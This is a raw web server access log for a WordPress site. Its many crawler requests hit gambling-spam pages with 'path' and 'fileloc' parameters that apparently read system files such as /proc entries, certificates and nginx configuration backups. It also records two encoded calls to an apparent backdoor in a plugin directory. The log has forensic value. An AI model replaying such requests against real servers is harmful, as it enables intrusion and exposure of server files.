44.213.202.136 - - [22/Oct/2025:00:35:16 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/self/root/proc/60/sessionid&path=//proc/self/root/proc/60 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
35.168.6.101 - - [22/Oct/2025:00:35:16 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/src/linux-headers-6.8.0-83/include/video/cvisionppc.h&path=//usr/src/linux-headers-6.8.0-83/include/video HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
216.73.216.183 - - [22/Oct/2025:00:35:16 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS19%2Fsubsystem%2Ftty12%2Fsubsystem%2FttyS17 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:16 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS19%2Fsubsystem%2Ftty12%2Fsubsystem%2FttyS17 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS19%2Fsubsystem%2Ftty12%2Fsubsystem%2FttyS17" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:35:17 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/driver/virtio1/block/vda/subsystem/sr0/mq HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:35:17 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/loop4/subsystem/vda/subsystem/loop7 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:35:18 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty33%2Fsubsystem%2Ftty29%2Fsubsystem%2Ftty40%2Fsubsystem%2Ftty53%2Fsubsystem%2FttyS18 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:19 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty33%2Fsubsystem%2Ftty29%2Fsubsystem%2Ftty40%2Fsubsystem%2Ftty53%2Fsubsystem%2FttyS18 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty33%2Fsubsystem%2Ftty29%2Fsubsystem%2Ftty40%2Fsubsystem%2Ftty53%2Fsubsystem%2FttyS18" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
3.213.213.161 - - [22/Oct/2025:00:35:20 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/thread-self/cwd/wp-includes/class-wp-http-encoding.php&path=//proc/thread-self/cwd/wp-includes HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
20.171.207.217 - - [22/Oct/2025:00:35:20 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/sr0/subsystem/loop0/bdi/subsystem HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:20 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/driver/virtio1/block/vda/vda1/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
57.141.0.51 - - [22/Oct/2025:00:35:21 +0000] "GET /2025/03/07/page/6/?path=//sys/class/pci_bus/0000:0b/subsystem/0000:12/subsystem/0000:06/subsystem/0000:0f/subsystem/0000:09 HTTP/1.1" 200 262209 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
216.73.216.183 - - [22/Oct/2025:00:35:21 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS6%2Fsubsystem%2FttyS15%2Fsubsystem%2Ftty63%2Fsubsystem%2Ftty39 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.135.21.75 - - [22/Oct/2025:00:35:22 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363836322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333236322q6163613961363262333335323432333537616439643937313662303966303462222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
216.73.216.183 - - [22/Oct/2025:00:35:22 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS6%2Fsubsystem%2FttyS15%2Fsubsystem%2Ftty63%2Fsubsystem%2Ftty39 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS6%2Fsubsystem%2FttyS15%2Fsubsystem%2Ftty63%2Fsubsystem%2Ftty39" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:23 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/loop6/subsystem/vda/subsystem/loop1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:23 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_rng/virtio3/subsystem/devices/virtio1/block/vda/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
50.16.181.128 - - [22/Oct/2025:00:35:23 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//etc/ssl/certs/GTS_Root_R2.pem&path=//etc/ssl/certs HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
23.23.104.107 - - [22/Oct/2025:00:35:24 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/src/linux-headers-6.8.0-64-generic/include/linux/pstore_blk.h&path=//usr/src/linux-headers-6.8.0-64-generic/include/linux HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:25 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS6%2Fsubsystem%2FttyS15%2Fsubsystem%2Ftty63%2Fsubsystem%2Ftty24 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:25 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS6%2Fsubsystem%2FttyS15%2Fsubsystem%2Ftty63%2Fsubsystem%2Ftty24 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty29%2Fsubsystem%2FttyS6%2Fsubsystem%2FttyS15%2Fsubsystem%2Ftty63%2Fsubsystem%2Ftty24" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:26 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/subsystem/vda/subsystem/loop0/subsystem/sr0/device/driver HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:26 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/driver/virtio1/block/vda/subsystem/vda/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:35:27 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2Ftty51%2Fsubsystem%2Ftty30%2Fsubsystem%2FttyS2 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
23.23.137.202 - - [22/Oct/2025:00:35:28 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?path=//usr/src/linux-headers-6.8.0-64-generic/include/sound/ac97 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:29 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2Ftty51%2Fsubsystem%2Ftty30%2Fsubsystem%2FttyS2 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2Ftty51%2Fsubsystem%2Ftty30%2Fsubsystem%2FttyS2" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:29 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/vda/device/block/vda/vda2/subsystem/vda/subsystem/vda/subsystem/vda1 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:29 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/vda1/subsystem/vda/subsystem/vda1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:35:32 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2Ftty31%2Fsubsystem%2FttyS18 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.135.21.75 - - [22/Oct/2025:00:35:33 +0000] "POST /wp-cron.php?doing_wp_cron=1761093332.3944559097290039062500 HTTP/1.1" 499 0 "-" "WordPress/6.3.1; https://datainsightnow.com"
52.44.108.124 - - [22/Oct/2025:00:35:33 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?path=//lib/dracut/modules.d/90bcache HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
52.70.209.13 - - [22/Oct/2025:00:35:34 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//var/lib/letsencrypt/backups/1736449627.7330112/nginx.conf_8&path=//var/lib/letsencrypt/backups/1736449627.7330112 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:34 +0000] "GET /1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit/?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2Ftty31%2Fsubsystem%2FttyS18 HTTP/1.1" 200 45438 "https://datainsightnow.com/1xbet-promo-password-nigeria-2024-a-hundred-otherwise-30-on-the-deposit?path=%2F%2Fsys%2Fdevices%2Fvirtual%2Ftty%2Ftty53%2Fsubsystem%2Ftty29%2Fsubsystem%2FttyS16%2Fsubsystem%2Ftty31%2Fsubsystem%2FttyS18" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:35 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/loop2/subsystem/vda/subsystem/vda/subsystem/vda/vda2 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:35 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/subsystem/sr0/queue/bsg/device/block/sr0/power HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.217 - - [22/Oct/2025:00:35:36 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/subsystem/vda/vda2/subsystem/vda/subsystem/loop7 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:36 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/vda1/subsystem/loop6 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
44.212.145.46 - - [22/Oct/2025:00:35:37 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//usr/share/perl5/Locale/RecodeData/ATARI_ST.pm&path=//usr/share/perl5/Locale/RecodeData HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:38 +0000] "GET /729349953?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:39 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/device/block/vda/device/driver/virtio1/block/vda/subsystem/loop3 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:39 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/vda2/subsystem/vda/subsystem/vda/vda1 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:35:40 +0000] "GET /729349953/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/729349953?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
35.174.145.141 - - [22/Oct/2025:00:35:40 +0000] "HEAD /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=/opt/wpsites/datacloudnow.com/wp-admin/includes/class-wp-site-health.php&path=/opt/wpsites/datacloudnow.com/wp-admin/includes HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/605.1.15 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/605.1.15"
52.167.144.211 - - [22/Oct/2025:00:35:40 +0000] "GET /zhHant/product/surugaya/D3599575579?campaign_uid=f64d716db5e979ed2f947dbaf4296895b951ae7f HTTP/1.1" 200 24062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
3.224.104.67 - - [22/Oct/2025:00:35:41 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?fileloc=//proc/934/task/934/status&path=//proc/934/task/934 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
47.128.115.203 - - [22/Oct/2025:00:35:41 +0000] "GET /?fileloc=%2F%2Fusr%2Fbin%2Fchown&path=%2F%2Fusr%2Fbin HTTP/1.1" 200 45439 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
216.73.216.183 - - [22/Oct/2025:00:35:41 +0000] "GET /620547685?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.135.21.75 - - [22/Oct/2025:00:35:42 +0000] "GET /wp-content/plugins/elementor-pro/core/database/database/index.php?ARRAY=7o2230223n313736313039363838322p2231223n22687474703n5p2s5p2s7n7335363476313373752r616p746s742r696r6o5p2s3s6p633q7068705s636s64655s6n6326743q313736313039333238322q6266396436636437633564333364303138386665373530626237623134376432222p2232223n226130333239623032353066623366656364343932343164363530613864656465222p2233223n223236313736316262613936313838633038333939626534333630613935386237222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2232332q33382q35392q36372q37332q38322q3330227q HTTP/1.1" 504 176 "-" "-"
20.171.207.217 - - [22/Oct/2025:00:35:42 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/vda1/subsystem/vda/device/block/vda/subsystem/loop0 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.183 - - [22/Oct/2025:00:35:42 +0000] "GET /620547685/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/620547685?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Freadme.html&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.78 - - [22/Oct/2025:00:35:43 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio3/subsystem/drivers/virtio_blk/virtio1/block/vda/mq/0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
3.209.174.110 - - [22/Oct/2025:00:35:44 +0000] "GET /real-currency-us-2025%E3%81%AE%E3%81%9F%E3%82%81%E3%81%AEweb%E4%B8%8A%E3%81%AE%E3%82%AE%E3%83%A3%E3%83%B3%E3%83%96%E3%83%AB%E3%83%96%E3%83%A9%E3%83%83%E3%82%AF%E3%82%B8%E3%83%A3%E3%83%83%E3%82%AF/?path=//usr/src/linux-headers-6.8.0-83-generic/arch/sh/boot HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
216.73.216.183 - - [22/Oct/2025:00:35:44 +0000] "GET /227353830?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Fwp-signup.php&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.183 - - [22/Oct/2025:00:35:45 +0000] "GET /227353830/?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Fwp-signup.php&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com HTTP/1.1" 200 45438 "https://datainsightnow.com/227353830?fileloc=%2Fopt%2Fwpsites%2Fdatainsightnow.com%2Fwp-signup.php&path=%2Fopt%2Fwpsites%2Fdatainsightnow.com" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
20.171.207.217 - - [22/Oct/2025:00:35:45 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/devices/virtio1/block/vda/device/block/vda/subsystem/vda/device/block/vda/subsystem/loop2/subsystem/loop7 HTTP/1.1" 200 45438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
20.171.207.78 - - [22/Oct/2025:00:35:45 +0000] "GET /?path=//sys/class/net/enp1s0/device/net/enp1s0/device/subsystem/drivers/virtio_blk/virtio1/block/vda/subsystem/vda/vda1/subsystem/sr0 HTTP/1.1" 301 5 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
